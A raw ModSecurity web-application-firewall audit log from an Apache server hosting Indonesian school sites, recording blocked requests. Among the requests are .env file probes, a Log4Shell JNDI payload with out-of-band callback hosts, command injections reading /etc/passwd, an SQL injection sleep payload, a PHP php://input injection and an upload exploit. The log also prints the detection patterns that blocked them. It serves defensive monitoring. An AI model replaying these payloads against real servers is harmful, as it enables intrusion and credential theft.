Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c652026-Z-- --485bba19-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1IwAAANQ 103.236.140.4 43200 103.236.140.4 8181 --485bba19-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --485bba19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485bba19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066495443 776 (- - -) Stopwatch2: 1748326066495443 776; combined=288, p1=252, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485bba19-Z-- --96476a1a-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1JAAAANU 103.236.140.4 43202 103.236.140.4 8181 --96476a1a-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --96476a1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96476a1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066677960 607 (- - -) Stopwatch2: 1748326066677960 607; combined=217, p1=187, p2=0, p3=0, p4=0, p5=29, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96476a1a-Z-- --27314803-A-- [27/May/2025:13:07:46 +0700] aDVWshLFq2VRfSzm6b8c0AAAAJg 103.236.140.4 43206 103.236.140.4 8181 --27314803-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --27314803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27314803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066860015 786 (- - -) Stopwatch2: 1748326066860015 786; combined=323, p1=288, p2=0, p3=0, p4=0, p5=35, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27314803-Z-- --eebdef0d-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1JgAAAMA 103.236.140.4 43208 103.236.140.4 8181 --eebdef0d-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --eebdef0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eebdef0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067042206 738 (- - -) Stopwatch2: 1748326067042206 738; combined=306, p1=257, p2=0, p3=0, p4=0, p5=49, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eebdef0d-Z-- --c1986663-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1JwAAANY 103.236.140.4 43210 103.236.140.4 8181 --c1986663-B-- GET /.env.production.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c1986663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1986663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067224255 673 (- - -) Stopwatch2: 1748326067224255 673; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1986663-Z-- --38002955-A-- [27/May/2025:13:07:47 +0700] aDVWs2TuEZUBy5rh0saJYwAAABA 103.236.140.4 43214 103.236.140.4 8181 --38002955-B-- GET /.env.stage HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --38002955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38002955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067406460 822 (- - -) Stopwatch2: 1748326067406460 822; combined=299, p1=265, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38002955-Z-- --901b9d70-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1KAAAAME 103.236.140.4 43216 103.236.140.4 8181 --901b9d70-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --901b9d70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --901b9d70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067588780 715 (- - -) Stopwatch2: 1748326067588780 715; combined=270, p1=236, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --901b9d70-Z-- --289fc805-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1KQAAANc 103.236.140.4 43218 103.236.140.4 8181 --289fc805-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --289fc805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289fc805-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067771258 657 (- - -) Stopwatch2: 1748326067771258 657; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289fc805-Z-- --510b4318-A-- [27/May/2025:13:07:47 +0700] aDVWs2TuEZUBy5rh0saJZAAAAAU 103.236.140.4 43222 103.236.140.4 8181 --510b4318-B-- GET /apps/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --510b4318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --510b4318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067953403 765 (- - -) Stopwatch2: 1748326067953403 765; combined=292, p1=245, p2=0, p3=0, p4=0, p5=46, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --510b4318-Z-- --4ed85f67-A-- [27/May/2025:13:07:48 +0700] aDVWtGTuEZUBy5rh0saJZQAAAAY 103.236.140.4 43224 103.236.140.4 8181 --4ed85f67-B-- GET /aws-ses/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4ed85f67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed85f67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326068135531 536 (- - -) Stopwatch2: 1748326068135531 536; combined=197, p1=164, p2=0, p3=0, p4=0, p5=33, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed85f67-Z-- --bf427f41-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1cgAAAMA 103.236.140.4 45538 103.236.140.4 8181 --bf427f41-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0qa44pgpeoi1bmoheagx6qfws73qgjbs.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0qa44pgpeoi1bmoheagj9yyet6wrmggo.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0qa44pgpeoi1bmoheagzgaqx6nmoz4ao.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheag1y853r5dy4s6r.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagqcuku8axoiuks.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheagjbo6uutibpq4o.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheagbs5ys5hhnqd8i.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0qa44pgpeoi1bmoheag3f17w8inhaeko.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0qa44pgpeoi1bmoheagwhg5kersfdxg8.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheaghtrxwysesgsmr.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagfwwxaw68ad75w.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheagincabgkayuodt.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheagwim7hbb6saiu3.oast.live} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0qa44pgpeoi1bmoheag3t9619n6gk86y.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0qa44pgpeoi1bmoheaggpw8w8e734pzw.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0qa44pgpeoi1bmoheagbbc8gjeho8sab.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168512925 --bf427f41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf427f41-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331324161012 6619 (- - -) Stopwatch2: 1748331324161012 6619; combined=4642, p1=545, p2=4056, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf427f41-Z-- --36573620-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1dgAAANc 103.236.140.4 45580 103.236.140.4 8181 --36573620-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168411332 --36573620-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --36573620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36573620-E-- --36573620-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748331324198083 2161 (- - -) Stopwatch2: 1748331324198083 2161; combined=690, p1=486, p2=160, p3=0, p4=0, p5=44, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36573620-Z-- --be3e0478-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1dQAAAME 103.236.140.4 45578 103.236.140.4 8181 --be3e0478-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159436190 --be3e0478-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be3e0478-E-- --be3e0478-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331324197950 2828 (- - -) Stopwatch2: 1748331324197950 2828; combined=1544, p1=391, p2=1125, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be3e0478-Z-- --c2444769-A-- [27/May/2025:14:35:44 +0700] aDVrUN6cNBpj1JOkpQlbkgAAAE8 103.236.140.4 45626 103.236.140.4 8181 --c2444769-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159940656 --c2444769-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --db783e60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db783e60-E-- --db783e60-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331784865241 4487 (- - -) Stopwatch2: 1748331784865241 4487; combined=2933, p1=458, p2=2443, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db783e60-Z-- --30685c62-A-- [27/May/2025:14:51:45 +0700] aDVvEd6cNBpj1JOkpQlbzwAAAE4 103.236.140.4 45804 103.236.140.4 8181 --30685c62-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 168512976 --30685c62-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --30685c62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30685c62-E-- --30685c62-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748332305387768 3918 (- - -) Stopwatch2: 1748332305387768 3918; combined=1879, p1=551, p2=1291, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30685c62-Z-- --6d695b40-A-- [27/May/2025:14:55:32 +0700] aDVv9N6cNBpj1JOkpQlb0wAAAEc 103.236.140.4 45822 103.236.140.4 8181 --6d695b40-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 16.63.115.154 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 16.63.115.154 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --6d695b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d695b40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
